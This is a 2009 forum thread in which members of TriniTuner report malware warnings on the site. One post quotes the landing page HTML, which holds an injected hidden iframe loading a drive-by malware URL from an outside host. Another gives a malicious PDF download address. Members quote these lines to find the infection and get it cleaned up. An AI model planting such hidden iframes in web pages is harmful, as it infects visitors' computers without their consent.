Postby W2J » August 19th, 2009, 12:33 am

Risk Name HTTP Acrobat PDF Suspicious File Download 3

attacker URL a8e:ru:8080/filez/readme..pdf

supermods fix your shitz

trvs

Postby trvs » August 19th, 2009, 12:59 am

<iframe src="http://ce5.at:8080/ts/in.cgi?pepsi149" width=125 height=125 style="visibility: hidden">

yep

its on the first page that redirects to http://www.trinituner.com/index2.php

get that cleaned Duane!!

the Russians pass through! Just like republictt.com

Check this report here--->> http://www.UnmaskParasites.com/security ... ituner.com

hidden link commented below

Code: Select all

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>:: TriniTuner.com v2.0 ::</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/JavaScript">
<!--

function MM_goToURL() { //v3.0
  var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
}
//-->
</script>
</head>

<body bgcolor="#003366" onLoad="MM_goToURL('parent','index2.php');return document.MM_returnValue">

<!--- hidden link --->
<iframe src="http://ce5.at:8080/ts/in.cgi?pepsi149" width=125 height=125 style="visibility: hidden"></iframe>
<!--- hidden link --->

<a href="index2.php">GO to homepage</a>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1147966-1";
urchinTracker();

</script>
</body>
</html>

fiveforward

Postby fiveforward » August 19th, 2009, 1:19 am

i used to get that problem like that as well until i realized the cause was inconsiderate moderators with bias playin' up in their pan-ka-lang. Still haven't solved the issue.
- ah well.

trvs

Postby trvs » August 19th, 2009, 1:59 am

If you using firefox you will not be able to view tuner... I hate IE so much I using it to post this reply :?

Zim

Postby Zim » August 19th, 2009, 2:12 am

jadez wrote:If you using firefox you will not be able to view tuner... I hate IE so much I using it to post this reply :?

Daz d exact msgs I get, but apprently it was merely a warning, nothing seems infected here. I using FF tho. I just makred d site as safe an all running well :oops:

TriniVdub

Postby TriniVdub » August 19th, 2009, 2:49 am

^^^ same message i gettin as well when using firefox....using safari now and its fine

TriniVdub

Postby TriniVdub » August 19th, 2009, 2:54 am

BWDMC all of a sudden ah get d message on safari now too, i switch to IE but ah feel i'll log off now before dem russians attack me too :?

pablo_tt

Postby pablo_tt » August 19th, 2009, 4:48 am

Postby Aaron 2NR » August 19th, 2009, 5:11 am

its blocked on mine..i had to ignore the warning

Humes

Postby Humes » August 19th, 2009, 5:17 am

I'm getting a malware warning on Chrome too. Just began when I logged in a few minutes ago.

Warning: Visiting this site may harm your computer!
The website at forums.trinituner.com appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that hosts malware can infect your computer.
For detailed information about the problems with this site, visit the Google Safe Browsing diagnostic page for forums.trinituner.com.
Learn more about how to protect yourself from harmful software online.

The Safe Browsing Diagnostic Page showed Tuner as clean, but mentioned:
This site was hosted on 1 network(s) including AS6539 (GT).

And if you follow that network link, you find out:

Safe Browsing
Diagnostic page for AS6539 (GT)

What happened when Google visited sites hosted on this network?
Of the 3706 site(s) we tested on this network over the past 90 days, 70 site(s), including, for example, pantokratoras.gr/, maherkitchencabinets.com/, zerolimite.ca/, served content that resulted in malicious software being downloaded and installed without user consent.

The last time Google tested a site on this network was on 2009-08-18, and the last time suspicious content was found was on 2009-08-18.

Has this network hosted sites acting as intermediaries for further malware distribution?
Over the past 90 days, we found 4 site(s) on this network, including, for example, ultimate100.net/, cap-pele.com/, onlinecashcraze.com/, that appeared to function as intermediaries for the infection of 6 other site(s) including, for example, angelfire.com/anime4/dbz-itensity/, leslieandsons.com/, animebabes.galeon.com/.

Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 3 site(s), including, for example, ultimate100.net/, onlinecashcraze.com/, goodthink.com/, that infected 6 other site(s), including, for example, angelfire.com/anime4/dbz-itensity/, galeon.com/animebabes/, animebabes.galeon.com/.

Not a techie, so I can't comment. Just the info I have there.

Postby Damien » August 19th, 2009, 5:27 am

trinituner sick :shock:

mediahouse

virus

Postby mediahouse » August 19th, 2009, 5:34 am

yes avast picks it up as well

angel_player

Postby angel_player » August 19th, 2009, 5:49 am

This computer I'm on has McAfee running and the browser is IE6 and I'm getting a load of virus warnings and trojan exploits everytime I load a page

Admins errrm :roll: ... allyuh tink allyuh cud jus errrm... fix dis problem?

Postby Damien » August 19th, 2009, 6:04 am

Getting the same warnings i using firefox

real

virus warnings

Postby real » August 19th, 2009, 6:57 am

getting the samewarnings.
unable to browse from firefox
avira keep reporting infected page.
lying low till probs fixed.

dry

Postby dry » August 19th, 2009, 7:38 am

It's fixed, but it'll take a while for the warnings to go away.

firstchoicett

Postby firstchoicett » August 19th, 2009, 7:50 am

well lets just hope that it fixed because this is bad service......if it not fixed..i ams till getting the virus warnings and pop ups. i am using windows live onecare.

trvs

Postby trvs » August 19th, 2009, 7:50 am

Richard you can try to request a review of the site using Google Webmaster Tools. I'm sure they would expedite this

dry

Postby dry » August 19th, 2009, 7:58 am

Yup. Already on it.

jeepers
Location: Still locating this location that when located it will appear as my location

Postby jeepers » August 19th, 2009, 7:59 am

same thing.using chrome though.

Postby Aaron 2NR » August 19th, 2009, 8:03 am

blocked on my pc at home

Postby mitsu_chick941 » August 19th, 2009, 8:06 am

xauss,i dont appreciate your signature!

Postby noshownogo » August 19th, 2009, 8:10 am

confirmed duane, Firefox reporting the site as a threat with malicious activity

White CZ4A

Postby White CZ4A » August 19th, 2009, 8:17 am

avast said that there was a virus and that it was blocking me from the page.

all and any trinituner pages

Postby noshownogo » August 19th, 2009, 8:21 am

leave it to microsoft internet explorer to find no issue :lol:

jhonnieblue

Postby jhonnieblue » August 19th, 2009, 8:24 am

still being blocker..had to go to a forum link to get in

team 394

Postby team 394 » August 19th, 2009, 8:46 am

Message of Malware also appearing today

Postby buzz » August 19th, 2009, 8:46 am

normal here :?

MISHI
3NE 2NR Aficionado

Postby MISHI » August 19th, 2009, 8:47 am

normal, but only problem I see is very often I get a 503 service unavailable error when opening a page or as you submit to a post....

ztune

Postby ztune » August 19th, 2009, 8:49 am

I'm getting this @ work. Internet Explorer is is opening the site but very slowly :?